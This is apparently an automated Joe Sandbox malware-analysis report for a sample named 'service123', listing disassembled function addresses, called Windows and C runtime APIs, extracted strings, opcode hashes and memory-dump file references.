Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: memcpy$memmovestrlen
String ID: Unknown error$iostream error
API String ID: 1234831610-3609051425
Opcode ID: 97628a486b19f16c84dbc24d57159bb694104b3cfb548fe07cdb1a8d4d0e8253
Instruction ID: 6f6cca0312059dc8a18ba0b5683d4a412923881f017cfac221033d387708d443
Opcode Fuzzy Hash: 97628a486b19f16c84dbc24d57159bb694104b3cfb548fe07cdb1a8d4d0e8253
Instruction Fuzzy Hash: DA61C5B4904308CFDB04DFA8C484A9EBBF1BF88314F14852ED499AB755E7759845CF92

Function 6C34F840 Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C34F85F
ReleaseSemaphore.KERNEL32 ref: 6C34F8E3

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: ReleaseSemaphoremalloc
String ID:
API String ID: 755742884-0
Opcode ID: 0b92c2061313df410f5221e49c0927df94b6c8bb25260dd0724b3d53e1b84d60
Instruction ID: 20bca72d5d076b531b8cf9946faeff4bf608c0541ca21752212f07f71e7e149c
Opcode Fuzzy Hash: 0b92c2061313df410f5221e49c0927df94b6c8bb25260dd0724b3d53e1b84d60
Instruction Fuzzy Hash: F7313AB0A093019FDB00FF2AC5487267BF0FB4A318F19865DD8988B695D376D545CFA2

Function 6C34FCE0 Relevance: 7.6, APIs: 5, Instructions: 78synchronizationCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C34FCEC
ReleaseSemaphore.KERNEL32 ref: 6C34FD7C
CreateSemaphoreW.KERNEL32 ref: 6C34FDC7
WaitForSingleObject.KERNEL32 ref: 6C34FE10

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWaitmalloc
String ID:
API String ID: 2768075653-0
Opcode ID: e14ac7c9be639313547e32c7712c4697f92666a376559b0079fd33ad2083938d
Instruction ID: 65d1a16f00608f83d97ee0dd4bb888f5ec10138cfbc178a8240b28a7aa16aa71
Opcode Fuzzy Hash: e14ac7c9be639313547e32c7712c4697f92666a376559b0079fd33ad2083938d
Instruction Fuzzy Hash: CB3118B06093018FDB01FF2AC5487267BF1BB4A718F19865CD8988B689D376D445CFA2

Function 6C408520 Relevance: 7.6, APIs: 5, Instructions: 64stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C408535
strlen.MSVCRT ref: 6C408583
memcpy.MSVCRT ref: 6C4085A0
setlocale.MSVCRT ref: 6C4085B4
setlocale.MSVCRT ref: 6C4085EA

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: aa0832aec06423da70e785967abe0f159d5b647aaa217e16ea3867b62823ca18
Instruction ID: 686f170388771b11e7967e4b89f884e143f84e3f3ae36366289948ef13072961
Opcode Fuzzy Hash: aa0832aec06423da70e785967abe0f159d5b647aaa217e16ea3867b62823ca18
Instruction Fuzzy Hash: 1121CFB460D3509FD340EF29D480A6EFBE4AF88668F458D6EE5C887701E338C9458F92

Function 6C359530 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 6C359549
_unlock.MSVCRT ref: 6C359571
calloc.MSVCRT ref: 6C3595BF

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: _lock_unlockcalloc
String ID:
API String ID: 3876498383-0
Opcode ID: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction ID: 24fcb5d8e711fd6597c6c07d6cf45118ab4d1c5864e5fd80755a3737f9c99ec9
Opcode Fuzzy Hash: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction Fuzzy Hash: 14115EB15043118FDB40DF28C480B96BBE4BF85344F5589A9D898CF749EB35D866CFA2

Function 6C350290 Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C3502BC
TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C3504DE), ref: 6C3502CA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C3504DE), ref: 6C350300

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: AllocCreateErrorLastSemaphore
String ID:
API String ID: 2256031600-0
Opcode ID: b730fd2211f24a0c6417b109e265c4df3035cc2527d5f27157e71cb231ebde56
Instruction ID: 868105229a660bfab5a70583c780296f92b3ee42d4e96538dab6d95798cb2c80
Opcode Fuzzy Hash: b730fd2211f24a0c6417b109e265c4df3035cc2527d5f27157e71cb231ebde56
Instruction Fuzzy Hash: F8F030B05093419BD700BF79C50877A7EB0BB4231CF904A5CE0E587A94E7764014CF63

Function 6C3DB990 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 432COMMON

Download Yara Rule

Strings

4@l, xrefs: 6C414FDC, 6C415363, 6C41537B
TAl, xrefs: 6C4151F8
HAl, xrefs: 6C415240

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID: HAl$TAl$4@l
API String ID: 0-3225705466
Opcode ID: 067046f97e8936374835010b48cd7f509cc9280f93a93563f94ccb4786b35e04
Instruction ID: 17178c2468682b96bfd5b65226dbb2e10ccbe4d9baa6329de8d4385d32b21fbb
Opcode Fuzzy Hash: 067046f97e8936374835010b48cd7f509cc9280f93a93563f94ccb4786b35e04
Instruction Fuzzy Hash: E1E186B5609A148AD705BF34C4809BEBAF1AF41A5CF02AC2CD0C25BF41DB7899499FC7

Function 6C3552CA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

@, xrefs: 6C354D17
(null), xrefs: 6C3552F7

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: 566eb5eb97e20a39bebfa42aded085f0dab2de4bf9b451dc3bbaee5d113c7db3
Instruction ID: 7eb00bdb5464657ff91e981f56d64adc73a31aa99228e5210fb30d4025923071
Opcode Fuzzy Hash: 566eb5eb97e20a39bebfa42aded085f0dab2de4bf9b451dc3bbaee5d113c7db3
Instruction Fuzzy Hash: 69A19F7160C3958BD7218F25D090B9ABBE1BF85308F958A1DD8DC87741D736E52ACF82

Function 00014BFA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

(null), xrefs: 00014C27
@, xrefs: 00014647

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: 149bd7b8123b76f886e4b0b05f06ed4b67ffadc8baf30a8728ec089399433cd1
Instruction ID: 2c9fa4cd683fd4eb9b2b717f47d2c1bb0129001fe19994d034c028101339cb50
Opcode Fuzzy Hash: 149bd7b8123b76f886e4b0b05f06ed4b67ffadc8baf30a8728ec089399433cd1
Instruction Fuzzy Hash: 0AA18B7560C3958BC7718F24C0807EABBE2BB85714F148A1DE8D88B362D735D9869B82

Function 00011B00 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 211COMMON

Download Yara Rule

Strings

Unknown pseudo relocation bit size %d., xrefs: 00011C6D
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00011C20
Unknown pseudo relocation protocol version %d., xrefs: 00011DF3

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: fad8c9d51e321b32e2d6e28931774b739aabbe5f09ad683078d104a048e53b0d
Instruction ID: 283becd77c4c5f66fea36271ac2fcdae9c68f1c385da3d54846195e1fd07de53
Opcode Fuzzy Hash: fad8c9d51e321b32e2d6e28931774b739aabbe5f09ad683078d104a048e53b0d
Instruction Fuzzy Hash: 5481B371A047058BDB18DF68E8C07EEB7F1FF89380F048529E994A7355E334E8958B92

Function 6C34A850 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 187COMMON

Download Yara Rule

Strings

Unknown pseudo relocation bit size %d., xrefs: 6C34A9BD
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 6C34A970
Unknown pseudo relocation protocol version %d., xrefs: 6C34AB43

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: 2004acafcc4515bf7bb99bc4e2c117fb21909fa8e216ae52090166e659daca56
Instruction ID: 12274d67f5a80bde8ea3b722d16cdafec4d44738595118689e2fef33fac2cc87
Opcode Fuzzy Hash: 2004acafcc4515bf7bb99bc4e2c117fb21909fa8e216ae52090166e659daca56
Instruction Fuzzy Hash: 6371BE32A1420A8BEB00DF69C981B9EB7F4FF45308F15C539D895ABB54D334E8458FA2

Function 6C359128 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C359142
strchr.MSVCRT ref: 6C359152
atoi.MSVCRT ref: 6C359163

Strings

., xrefs: 6C359147

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: c2b570a3904f17255e6178cae360b51e0f0771d8f4e0b0ba75ebf925efdecfd1
Instruction ID: 05570278b4ebcb8a2bf4c4b684138dacd7b6993af06cdbd8d117461707235b3a
Opcode Fuzzy Hash: c2b570a3904f17255e6178cae360b51e0f0771d8f4e0b0ba75ebf925efdecfd1
Instruction Fuzzy Hash: 69E08CF49047118AD7007F38C40839AB6E5BB80308FC5882CD4C887B00E73DC42A9BA3

Function 000180D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 000180F2
strchr.MSVCRT ref: 00018102
atoi.MSVCRT ref: 00018113

Strings

., xrefs: 000180F7

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction ID: d167cd27ced0f1f70a4b1a9766a621fa1a00e238744a938b22fd8293a5dc5560
Opcode Fuzzy Hash: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction Fuzzy Hash: 63E0ECB29447019AD7407F78C90A39ABAE5AB81300F49CD6CE88887246EB7999869752

Function 6C359293 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 6C35929F
GetProcAddress.KERNEL32 ref: 6C3592B3

Strings

SystemFunction036, xrefs: 6C3592A8
advapi32.dll, xrefs: 6C359298

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SystemFunction036$advapi32.dll
API String ID: 2574300362-1354007664
Opcode ID: c9bbeeace10adae35b6467a1e457a4b0cd31bfc7f3e9bb4caa8174453c8b9fb6
Instruction ID: ddc2446049ec1cf51d51dcc34f7d3b819d0a621f47eee97f421ecff8d25ddd0b
Opcode Fuzzy Hash: c9bbeeace10adae35b6467a1e457a4b0cd31bfc7f3e9bb4caa8174453c8b9fb6
Instruction Fuzzy Hash: CDE046F28883008FCB00FF78950785ABFF0FA06324F40496AD08997604E3388015DF9B

Function 6C351409 Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 482COMMON

Download Yara Rule

Strings

5, xrefs: 6C3514D2

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-2226203566
Opcode ID: 4a92c3d604d1ad4a49a811c87df30bc45951b22cd63bf2d83829eaf13181a5de
Instruction ID: cfc530383239b15ea67b90353a54ea9705a6c01d8b23dea3dd40d72d7b39fa63
Opcode Fuzzy Hash: 4a92c3d604d1ad4a49a811c87df30bc45951b22cd63bf2d83829eaf13181a5de
Instruction Fuzzy Hash: 6F220F75A097408FC720CF69C584A5AFBE1BF88308F958A2EE8D897710D735E855CF82

Function 6C3D9F20 Relevance: 6.4, APIs: 2, Strings: 2, Instructions: 366COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C3D9FEC
memset.MSVCRT ref: 6C3DA04E

Strings

8OBl0, xrefs: 6C3D9FF1, 6C3DA00D
8OBl0, xrefs: 6C3DA1F4, 6C3DA200

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: memset
String ID: 8OBl0$8OBl0
API String ID: 2221118986-457755930
Opcode ID: 6a944f998c8fc05fd99a7f034df3ead1c547b8f8f3614e7a6af338aeb5c923cc
Instruction ID: 9860f2d18dbd0ebba139e50f5988095e157d6971fc5235f17283309187920be1
Opcode Fuzzy Hash: 6a944f998c8fc05fd99a7f034df3ead1c547b8f8f3614e7a6af338aeb5c923cc
Instruction Fuzzy Hash: C1F11A76609205CFC711DF29C680A5AB7F1FF8A318B1A865DD8998BB10D732F906CF91

Function 6C34A340 Relevance: 6.3, APIs: 5, Instructions: 98stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C34A3C5
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C35C41C), ref: 6C34A3E0
free.MSVCRT ref: 6C34A3EA

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: f83682a57ff05c468d6385b5a1f4f0c41b2e385d53f38c431f7b2d7ae6024f9b
Instruction ID: 9d9b91b113f88dc379ea773df4c65a29a23770477db3b45fa4c5fa1499574c28
Opcode Fuzzy Hash: f83682a57ff05c468d6385b5a1f4f0c41b2e385d53f38c431f7b2d7ae6024f9b
Instruction Fuzzy Hash: 06315C7660A7118BE3009F6AD48461FBBE5AFC175CF218A3CE9E447B40E732C4458FA2

Function 6C395C40 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 308COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C395D74
memchr.MSVCRT ref: 6C395D93

Part of subcall function 6C408520: setlocale.MSVCRT ref: 6C408535

Strings

-, xrefs: 6C395F72
., xrefs: 6C395D85

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: -$.
API String ID: 4291329590-3807043784
Opcode ID: 2158aef5469f2be67b0c340e5291a0b2a58e4fb9935647c79ed3aa01e4e82a7e
Instruction ID: c3d4d0bc60eea1123b5cf537acc3eef590fc4b4d917f6026939097fb9780ed93
Opcode Fuzzy Hash: 2158aef5469f2be67b0c340e5291a0b2a58e4fb9935647c79ed3aa01e4e82a7e
Instruction Fuzzy Hash: F8D147B19087598FCB00DFA8C08458EBBF1BF48318F15862AE894EB755E734D985CF92

Function 6C396080 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 306COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C3961AE
memchr.MSVCRT ref: 6C3961CD

Part of subcall function 6C408520: setlocale.MSVCRT ref: 6C408535

Strings

., xrefs: 6C3961BF
6, xrefs: 6C3963B6

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: .$6
API String ID: 4291329590-4089497287
